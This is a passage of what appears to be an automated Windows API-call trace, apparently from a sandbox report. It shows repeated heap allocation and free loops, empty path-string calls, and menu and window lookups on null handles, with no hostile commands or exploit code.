hHeap=0x3840000) returned 1 [0176.017] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841360 | out: hHeap=0x3840000) returned 1 [0176.017] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841320 | out: hHeap=0x3840000) returned 1 [0176.017] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0176.018] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841310 | out: hHeap=0x3840000) returned 1 [0176.018] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x8) returned 0x3841310 [0176.018] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x20) returned 0x3841320 [0176.018] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x10) returned 0x3841348 [0176.018] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x10) returned 0x3841360 [0176.018] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841348 | out: hHeap=0x3840000) returned 1 [0176.018] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841360 | out: hHeap=0x3840000) returned 1 [0176.018] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841320 | out: hHeap=0x3840000) returned 1 [0176.018] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0176.018] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841310 | out: hHeap=0x3840000) returned 1 [0176.018] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x8) returned 0x3841310 [0176.018] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x20) returned 0x3841320 [0176.018] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x10) returned 0x3841348 [0176.018] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x10) returned 0x3841360 [0176.018] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841348 | out: hHeap=0x3840000) returned 1 [0176.018] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841360 | out: hHeap=0x3840000) returned 1 [0176.018] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841320 | out: hHeap=0x3840000) returned 1 [0176.018] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0176.018] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841310 | out: hHeap=0x3840000) returned 1 [0176.018] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x8) returned 0x3841310 [0176.018] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x20) returned 0x3841320 [0176.018] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x10) returned 0x3841348 [0176.018] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x10) returned 0x3841360 [0176.018] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841348 | out: hHeap=0x3840000) returned 1 [0176.018] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841360 | out: hHeap=0x3840000) returned 1 [0176.018] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841320 | out: hHeap=0x3840000) returned 1 [0176.018] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0176.018] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841310 | out: hHeap=0x3840000) returned 1 [0176.018] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x8) returned 0x3841310 [0176.018] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x20) returned 0x3841320 [0176.018] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x10) returned 0x3841348 [0176.018] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x10) returned 0x3841360 [0176.018] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841348 | out: hHeap=0x3840000) returned 1 [0176.018] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841360 | out: hHeap=0x3840000) returned 1 [0176.018] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841320 | out: hHeap=0x3840000) returned 1 [0176.018] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0176.018] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841310 | out: hHeap=0x3840000) returned 1 [0176.018] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x8) returned 0x3841310 [0176.018] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x20) returned 0x3841320 [0176.019] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x10) returned 0x3841348 [0176.019] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x10) returned 0x3841360 [0176.019] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841348 | out: hHeap=0x3840000) returned 1 [0176.019] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841360 | out: hHeap=0x3840000) returned 1 [0176.019] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841320 | out: hHeap=0x3840000) returned 1 [0176.019] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0176.019] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841310 | out: hHeap=0x3840000) returned 1 [0176.019] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x8) returned 0x3841310 [0176.019] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x20) returned 0x3841320 [0176.019] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x10) returned 0x3841348 [0176.019] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x10) returned 0x3841360 [0176.019] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841348 | out: hHeap=0x3840000) returned 1 [0176.019] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841360 | out: hHeap=0x3840000) returned 1 [0176.019] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841320 | out: hHeap=0x3840000) returned 1 [0176.019] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0176.019] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841310 | out: hHeap=0x3840000) returned 1 [0176.019] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x8) returned 0x3841310 [0176.019] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x20) returned 0x3841320 [0176.019] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x10) returned 0x3841348 [0176.019] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x10) returned 0x3841360 [0176.019] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841348 | out: hHeap=0x3840000) returned 1 [0176.019] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841360 | out: hHeap=0x3840000) returned 1 [0176.019] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841320 | out: hHeap=0x3840000) returned 1 [0176.019] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0176.019] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841310 | out: hHeap=0x3840000) returned 1 [0176.019] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x8) returned 0x3841310 [0176.019] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x20) returned 0x3841320 [0176.019] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x10) returned 0x3841348 [0176.019] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x10) returned 0x3841360 [0176.019] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841348 | out: hHeap=0x3840000) returned 1 [0176.019] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841360 | out: hHeap=0x3840000) returned 1 [0176.019] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841320 | out: hHeap=0x3840000) returned 1 [0176.019] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0176.019] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841310 | out: hHeap=0x3840000) returned 1 [0176.019] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x8) returned 0x3841310 [0176.019] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x20) returned 0x3841320 [0176.019] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x10) returned 0x3841348 [0176.019] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x10) returned 0x3841360 [0176.019] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841348 | out: hHeap=0x3840000) returned 1 [0176.019] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841360 | out: hHeap=0x3840000) returned 1 [0176.020] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841320 | out: hHeap=0x3840000) returned 1 [0176.020] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0176.020] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841310 | out: hHeap=0x3840000) returned 1 [0176.020] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x8) returned 0x3841310 [0176.020] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x20) returned 0x3841320 [0176.020] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x10) returned 0x3841348 [0176.020] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x10) returned 0x3841360 [0176.020] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841348 | out: hHeap=0x3840000) returned 1 [0176.020] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841360 | out: hHeap=0x3840000) returned 1 [0176.020] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841320 | out: hHeap=0x3840000) returned 1 [0176.020] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0176.020] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841310 | out: hHeap=0x3840000) returned 1 [0176.020] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x8) returned 0x3841310 [0176.020] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x20) returned 0x3841320 [0176.020] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x10) returned 0x3841348 [0176.020] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x10) returned 0x3841360 [0176.020] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841348 | out: hHeap=0x3840000) returned 1 [0176.020] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841360 | out: hHeap=0x3840000) returned 1 [0176.020] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841320 | out: hHeap=0x3840000) returned 1 [0176.020] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0176.020] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841310 | out: hHeap=0x3840000) returned 1 [0176.020] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x8) returned 0x3841310 [0176.020] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x20) returned 0x3841320 [0176.020] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x10) returned 0x3841348 [0176.020] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x10) returned 0x3841360 [0176.020] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841348 | out: hHeap=0x3840000) returned 1 [0176.020] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841360 | out: hHeap=0x3840000) returned 1 [0176.020] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841320 | out: hHeap=0x3840000) returned 1 [0176.020] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0176.020] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841310 | out: hHeap=0x3840000) returned 1 [0176.020] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x8) returned 0x3841310 [0176.020] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x20) returned 0x3841320 [0176.020] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x10) returned 0x3841348 [0176.020] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x10) returned 0x3841360 [0176.020] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841348 | out: hHeap=0x3840000) returned 1 [0176.020] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841360 | out: hHeap=0x3840000) returned 1 [0176.020] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841320 | out: hHeap=0x3840000) returned 1 [0176.020] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0176.021] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x3841310 | out: hHeap=0x3840000) returned 1 [0176.021] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x38412f8 | out: hHeap=0x3840000) returned 1 [0176.021] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x38412d0 | out: hHeap=0x3840000) returned 1 [0176.021] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x38412c0 | out: hHeap=0x3840000) returned 1 [0176.021] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x8) returned 0x38412c0 [0176.021] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x20) returned 0x38412d0 [0176.021] RtlAllocateHeap (HeapHandle=0x3840000, Flags=0x0, Size=0x10) returned 0x38412f8 [0176.021] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0176.021] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0176.021] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0176.021] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0176.021] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0176.021] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0176.021] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0176.021] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0176.021] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0176.021] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0176.021] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0176.021] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0176.021] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0176.021] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0176.021] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0176.021] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0176.021] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0176.021] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0176.021] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0176.021] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0176.021] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0176.021] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0176.021] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0176.021] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0176.021] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0176.021] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0176.021] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0176.021] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0176.022] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0176.022] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0176.022] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0176.022] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0176.022] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0176.022] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0176.022] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0176.022] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0176.022] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0176.022] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0176.022] GetStockObject (i=6) returned 0x1b00018 [0176.022] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.022] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.022] PathFileExistsW (pszPath=0x0) returned 0 [0176.022] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.022] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.022] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.022] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.022] GetMenu (hWnd=0x0) returned 0x0 [0176.022] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.023] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.023] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.023] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.023] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.023] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.023] GetStockObject (i=6) returned 0x1b00018 [0176.023] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.023] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.023] PathFileExistsW (pszPath=0x0) returned 0 [0176.023] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.023] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.023] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.023] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.023] GetMenu (hWnd=0x0) returned 0x0 [0176.023] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x353) returned -1 [0176.023] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.023] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.023] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.023] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.024] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.024] GetStockObject (i=6) returned 0x1b00018 [0176.024] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.024] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.024] PathFileExistsW (pszPath=0x0) returned 0 [0176.024] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.024] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.024] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.024] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.024] GetMenu (hWnd=0x0) returned 0x0 [0176.024] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.024] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.024] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.024] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.024] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.024] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.024] GetStockObject (i=6) returned 0x1b00018 [0176.024] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.024] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.024] PathFileExistsW (pszPath=0x0) returned 0 [0176.024] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.024] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.024] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.024] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.024] GetMenu (hWnd=0x0) returned 0x0 [0176.024] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.024] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.024] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.024] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.024] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.024] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.024] GetStockObject (i=6) returned 0x1b00018 [0176.024] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.024] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.025] PathFileExistsW (pszPath=0x0) returned 0 [0176.025] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.025] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.025] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.025] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.025] GetMenu (hWnd=0x0) returned 0x0 [0176.025] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x27e) returned -1 [0176.025] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.025] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.025] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.025] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.025] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.025] GetStockObject (i=6) returned 0x1b00018 [0176.025] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.025] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.025] PathFileExistsW (pszPath=0x0) returned 0 [0176.025] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.025] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.025] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.025] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.025] GetMenu (hWnd=0x0) returned 0x0 [0176.025] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.025] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.025] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.025] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.025] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.025] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.025] GetStockObject (i=6) returned 0x1b00018 [0176.025] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.025] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.025] PathFileExistsW (pszPath=0x0) returned 0 [0176.025] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.025] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.025] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.025] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.026] GetMenu (hWnd=0x0) returned 0x0 [0176.026] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x354) returned -1 [0176.026] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.026] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.026] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.026] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.026] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.026] GetStockObject (i=6) returned 0x1b00018 [0176.026] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.026] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.026] PathFileExistsW (pszPath=0x0) returned 0 [0176.026] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.026] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.026] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.026] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.026] GetMenu (hWnd=0x0) returned 0x0 [0176.026] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.026] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.026] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.026] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.026] 